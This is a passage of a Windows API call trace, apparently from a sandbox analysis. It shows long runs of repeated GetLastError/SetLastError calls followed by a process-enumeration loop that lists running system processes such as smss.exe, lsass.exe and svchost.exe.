(dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.780] SetLastError (dwErrCode=0x0) [0044.780] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.781] GetLastError () returned 0x0 [0044.781] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.782] SetLastError (dwErrCode=0x0) [0044.782] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.783] SetLastError (dwErrCode=0x0) [0044.783] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.784] SetLastError (dwErrCode=0x0) [0044.784] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.785] SetLastError (dwErrCode=0x0) [0044.785] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.786] GetLastError () returned 0x0 [0044.786] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.787] GetLastError () returned 0x0 [0044.787] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.788] SetLastError (dwErrCode=0x0) [0044.788] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.789] SetLastError (dwErrCode=0x0) [0044.789] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.790] SetLastError (dwErrCode=0x0) [0044.790] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.791] GetLastError () returned 0x0 [0044.791] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.792] GetLastError () returned 0x0 [0044.792] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.793] SetLastError (dwErrCode=0x0) [0044.793] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.794] SetLastError (dwErrCode=0x0) [0044.794] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.795] SetLastError (dwErrCode=0x0) [0044.795] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.796] SetLastError (dwErrCode=0x0) [0044.796] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.797] SetLastError (dwErrCode=0x0) [0044.797] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.798] SetLastError (dwErrCode=0x0) [0044.798] GetLastError () returned 0x0 [0044.799] SetLastError (dwErrCode=0x0) [0044.799] GetLastError () returned 0x0 [0044.799] SetLastError (dwErrCode=0x0) [0044.799] GetLastError () returned 0x0 [0044.799] SetLastError (dwErrCode=0x0) [0044.799] GetLastError () returned 0x0 [0044.799] SetLastError (dwErrCode=0x0) [0044.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c0 [0044.856] Process32FirstW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.857] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.858] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.858] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.859] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.860] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.860] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.861] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.861] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.862] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.863] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0044.863] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0044.864] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.864] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0044.865] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.866] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.866] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.867] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.868] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.868] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.869] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.869] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.870] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.873] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0044.874] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.875] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.875] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0044.876] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0044.876] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.877] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0044.878] Process32NextW (in: hSnapshot=0x2c0, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 